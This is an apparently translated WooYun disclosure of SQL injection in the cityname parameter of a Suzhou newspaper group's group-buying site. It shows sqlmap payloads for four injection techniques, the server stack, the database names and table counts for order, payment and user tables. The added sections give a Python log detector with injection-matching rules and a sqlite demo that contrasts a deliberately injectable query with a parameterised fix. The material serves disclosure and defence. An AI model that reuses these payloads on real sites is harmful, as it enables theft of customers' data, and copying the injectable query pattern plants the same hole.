
Vulnerability Summary

Defect ID: wooyun-2016-0169210

Title: SQL injection on a group-buying site leaks order information

Vendor: 苏州日报报业集团 (Suzhou Daily Newspaper Group)

Author: 蝶.!

Submitted: 2016-01-17 22:30

Fixed: 2016-02-27 11:49

Published: 2016-02-27 11:49

Type: SQL injection

Severity: Medium

Self-assessed Rank: 10

Status: Handed over to a third-party partner organization (CNCERT, the National Computer Network Emergency Response Technical Team) for handling

Source: http://www.wooyun.org; for questions or help contact [email protected]


Vulnerability Details

Disclosure status:

2016-01-17: Details sent to the vendor; awaiting vendor handling
2016-01-20: Vendor confirmed; details visible to the vendor only
2016-01-30: Details disclosed to core white hats and relevant domain experts
2016-02-09: Details disclosed to regular white hats
2016-02-19: Details disclosed to intern white hats
2016-02-27: Details disclosed to the public

Brief description:

苏州豹行天下电子商务有限公司 is a wholly owned subsidiary of 苏州日报报业集团, founded in 2010 with registered capital of RMB 2,000,000. On founding it launched 豹团网, a group-buying lifestyle-services site, and it is the newspaper group's only large e-commerce platform.

Detailed description:

Injection point: http://**.**.**.**//index.php?m=Index&a=index&cityname=suzhou

The cityname GET parameter is concatenated into a MySQL query without escaping or binding; sqlmap confirmed four injection techniques against it (output below). Two details worth noting: every payload places a URL-encoded null byte (%00) immediately before the closing single quote, and the report does not say what filter, if any, that prefix was needed to get past; and the error-based payload is the standard MySQL duplicate-key trick, where CONCAT() of a marker, the value to extract and FLOOR(RAND(0)*2), grouped together with COUNT(*), produces a "Duplicate entry" error whose message carries the extracted value. The UNION payload also shows that the original SELECT returns two columns.

---
Parameter: cityname (GET)
Type: boolean-based blind
Title: OR boolean-based blind - WHERE or HAVING clause (MySQL comment)
Payload: m=Index&a=index&cityname=-9529%00' OR 9145=9145#
Type: error-based
Title: MySQL >= 5.0 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause
Payload: m=Index&a=index&cityname=suzhou%00' AND (SELECT 5114 FROM(SELECT COUNT(*),CONCAT(0x7171767a71,(SELECT (ELT(5114=5114,1))),0x71766a6a71,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.CHARACTER_SETS GROUP BY x)a) AND 'sQwW'='sQwW
Type: AND/OR time-based blind
Title: MySQL >= 5.0.12 AND time-based blind (SELECT)
Payload: m=Index&a=index&cityname=suzhou%00' AND (SELECT * FROM (SELECT(SLEEP(5)))frvr) AND 'bKGS'='bKGS
Type: UNION query
Title: Generic UNION query (NULL) - 2 columns
Payload: m=Index&a=index&cityname=suzhou%00' UNION ALL SELECT CONCAT(0x7171767a71,0x70796555514b6b555463766d4f6e5145444a6c645957714b655a66446a4c68564358615176747a47,0x71766a6a71),NULL-- -
---
web server operating system: Linux CentOS 5.10
web application technology: Apache 2.2.3, PHP 5.1.6
back-end DBMS: MySQL 5.0
available databases [12]:
[*] 0512bao
[*] information_schema
[*] monitor_db
[*] mysql
[*] pointshop_db
[*] pointshop_db_20150723
[*] pointshop_db_bak
[*] subaotuan_cui
[*] subaotuan_hx
[*] subaotuan_linux
[*] sz69333333_db
[*] szbt

Proof of vulnerability:

Database: 0512bao
+-----------------------------------+---------+
| Table                             | Entries |
+-----------------------------------+---------+
| pre_ucenter_members               |   92498 |
| pre_ucenter_memberfields          |   92497 |
| pre_ucenter_mergemembers          |   50966 |
| pre_common_district               |   45051 |
| pre_common_member_count           |   17507 |
| pre_common_member_status          |   17507 |
| pre_common_member                 |   17506 |
| pre_common_member_field_home      |   13049 |
| pre_forum_statlog                 |   10601 |
Database: subaotuan_cui
+----------------------------------+---------+
| Table                            | Entries |
+----------------------------------+---------+
| fanwe_payment_log                |  315921 |
| fanwe_group_bond                 |  265639 |
| fanwe_sms_send_log               |  259919 |
| fanwe_order_goods                |  198486 |
| fanwe_order                      |  197548 |
| fanwe_payment_money_log          |  145783 |
| fanwe_order_incharge             |  144277 |
| fanwe_send_list                  |   82702 |
| fanwe_user                       |   72702 |
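For anyone who has to find this traffic after the fact, the following is an added example, not part of the original report and not the site's code: a small Python detector that percent-decodes each request parameter in Apache combined-format access-log lines and tags values matching the technique families in the sqlmap output above (NUL before a quote, numeric tautology, FLOOR(RAND(0)*2) with GROUP BY, SLEEP(), UNION SELECT, information_schema, comment terminators). The log lines are constructed from the report's payloads; the addresses, timestamps and user agents are invented, and the error-based payload is shortened.

```python
import re
from urllib.parse import parse_qsl, quote, urlsplit

# Request values modelled on the sqlmap payloads in the report (the error-based
# one is shortened). The benign 'suzhou' request is the control case.
PAYLOADS = {
    "benign":  "suzhou",
    "boolean": "-9529\x00' OR 9145=9145#",
    "error":   ("suzhou\x00' AND (SELECT 5114 FROM(SELECT COUNT(*),CONCAT(0x7171767a71,"
                "(SELECT (ELT(5114=5114,1))),0x71766a6a71,FLOOR(RAND(0)*2))x "
                "FROM INFORMATION_SCHEMA.CHARACTER_SETS GROUP BY x)a) AND 'sQwW'='sQwW"),
    "time":    "suzhou\x00' AND (SELECT * FROM (SELECT(SLEEP(5)))frvr) AND 'bKGS'='bKGS",
    "union":   "suzhou\x00' UNION ALL SELECT CONCAT(0x7171767a71,0x7079,0x71766a6a71),NULL-- -",
}


def build_log():
    """Constructed Apache combined-format lines; addresses, times and UAs are invented."""
    lines = []
    for i, (name, payload) in enumerate(PAYLOADS.items(), start=1):
        agent = "Mozilla/5.0" if name == "benign" else "sqlmap/1.0-dev"
        # quote(safe="") percent-encodes everything sqlmap would have sent encoded,
        # including the NUL byte as %00, the quote as %27 and '#' as %23
        target = "/index.php?m=Index&a=index&cityname=" + quote(payload, safe="")
        lines.append(
            f'10.0.0.{i} - - [17/Jan/2016:22:0{i}:00 +0800] '
            f'"GET {target} HTTP/1.1" 200 5120 "-" "{agent}"'
        )
    return "\n".join(lines)


REQUEST_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] '
    r'"(?P<method>[A-Z]+) (?P<target>\S+) [^"]*" (?P<status>\d{3})'
)

# One rule per technique family seen in the report's sqlmap output, applied to
# the percent-decoded parameter value.
RULES = [
    ("null-byte-before-quote", re.compile(r"\x00\s*'")),
    ("boolean-blind", re.compile(r"'\s*(?:OR|AND)\s+(\d+)\s*=\s*\1\b", re.I)),
    ("error-based", re.compile(r"FLOOR\s*\(\s*RAND\s*\(\s*0\s*\)\s*\*\s*2\s*\).*GROUP\s+BY", re.I | re.S)),
    ("time-based", re.compile(r"\b(?:SLEEP|BENCHMARK)\s*\(", re.I)),
    ("union-select", re.compile(r"\bUNION\s+(?:ALL\s+)?SELECT\b", re.I)),
    ("information_schema", re.compile(r"\binformation_schema\b", re.I)),
    ("comment-terminator", re.compile(r"#|--\s")),
]


def scan(log_text):
    """Return one finding per (request, parameter) whose decoded value trips a rule."""
    findings = []
    for line in log_text.splitlines():
        m = REQUEST_RE.match(line)
        if not m:
            continue
        query = urlsplit(m.group("target")).query
        # parse_qsl percent-decodes, so %00 becomes a real NUL and %27 a quote
        for param, value in parse_qsl(query, keep_blank_values=True):
            tags = [name for name, rule in RULES if rule.search(value)]
            if tags:
                findings.append({"ip": m.group("ip"), "time": m.group("ts"),
                                 "param": param, "tags": tags})
    return findings


if __name__ == "__main__":
    for finding in scan(build_log()):
        print(finding["ip"], finding["param"], ",".join(finding["tags"]))
```

To run it over a real access log, pass the file contents to scan(). The rules are deliberately narrow, tuned to what an unmodified sqlmap run emitted here; an attacker using tamper scripts or hand-crafted payloads will need broader rules, and matching on the decoded value rather than the raw request line is what keeps %00 and %27 encodings from hiding the payload.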

Fix recommendation:

Copyright notice: when reposting, credit the source as 蝶.!@乌云 (WooYun).
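The original report leaves this section empty. The following is an added example, not the reporter's or the site's code, showing the kind of query construction that lets the payloads above through and the corresponding fix: an allowlist on cityname plus a bound parameter. It uses Python's sqlite3 as a stand-in for the site's MySQL, so the payloads are adapted (no leading NUL, since the sqlite3 module refuses a NUL in statement text; '--' instead of MySQL's '#'; a real column list instead of sqlmap's hex markers). The schema, rows and column names are invented; only the table name fanwe_user comes from the report.

```python
import re
import sqlite3


def build_db():
    """Constructed in-memory stand-in for the site's database (schema and rows invented)."""
    conn = sqlite3.connect(":memory:")
    conn.executescript("""
        CREATE TABLE city (name TEXT, region TEXT);
        INSERT INTO city VALUES ('suzhou', 'jiangsu'), ('wuxi', 'jiangsu');
        CREATE TABLE fanwe_user (user_name TEXT, password TEXT);
        INSERT INTO fanwe_user VALUES ('alice', 'hash-1'), ('bob', 'hash-2');
    """)
    return conn


def lookup_city_vulnerable(conn, cityname):
    """The query shape the report implies: the GET value is spliced into the SQL text."""
    sql = "SELECT name, region FROM city WHERE name = '%s'" % cityname
    return conn.execute(sql).fetchall()


# A city slug on this site is a short lowercase word ('suzhou'); anything else
# (quotes, NUL bytes, SQL keywords) is rejected before it reaches the database.
CITY_SLUG = re.compile(r"[a-z]{1,32}")


def lookup_city_safe(conn, cityname):
    """Allowlist validation plus a bound parameter instead of string splicing."""
    if not CITY_SLUG.fullmatch(cityname):
        return []
    return conn.execute(
        "SELECT name, region FROM city WHERE name = ?", (cityname,)
    ).fetchall()


# Payloads adapted from the report: the leading %00 is dropped, MySQL's '#'
# comment becomes '--', and a real column list replaces sqlmap's hex markers.
BOOL_PAYLOAD = "-9529' OR 9145=9145-- -"
UNION_PAYLOAD = "suzhou' UNION ALL SELECT user_name, password FROM fanwe_user-- -"
# Same tautology with the report's NUL byte kept, to show the allowlist rejects it
NUL_PAYLOAD = "suzhou\x00' OR 9145=9145-- -"


def demo():
    conn = build_db()
    return {
        "vuln_bool": lookup_city_vulnerable(conn, BOOL_PAYLOAD),    # every city row
        "vuln_union": lookup_city_vulnerable(conn, UNION_PAYLOAD),  # city row + fanwe_user rows
        "safe_bool": lookup_city_safe(conn, BOOL_PAYLOAD),          # []
        "safe_union": lookup_city_safe(conn, UNION_PAYLOAD),        # []
        "safe_nul": lookup_city_safe(conn, NUL_PAYLOAD),            # []
        "safe_normal": lookup_city_safe(conn, "suzhou"),            # [('suzhou', 'jiangsu')]
    }


if __name__ == "__main__":
    for key, rows in demo().items():
        print(key, rows)
```

On the stack in the report (PHP 5.1.6, MySQL 5.0) the equivalent fix is a prepared statement with bound parameters through mysqli or PDO, kept behind the same allowlist; the allowlist is defence in depth, not a substitute for binding, since other parameters on the site will not have such a narrow legitimate shape.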


Vendor Response

Vendor response:

Severity: Medium

Rank: 8

Confirmed: 2016-01-20 14:22

Vendor reply:

CNVD confirmed that it could not reproduce the described situation; the case has been forwarded via CNCERT to the Jiangsu branch center, which will coordinate follow-up handling with the organization that administers the site.

Latest status:

None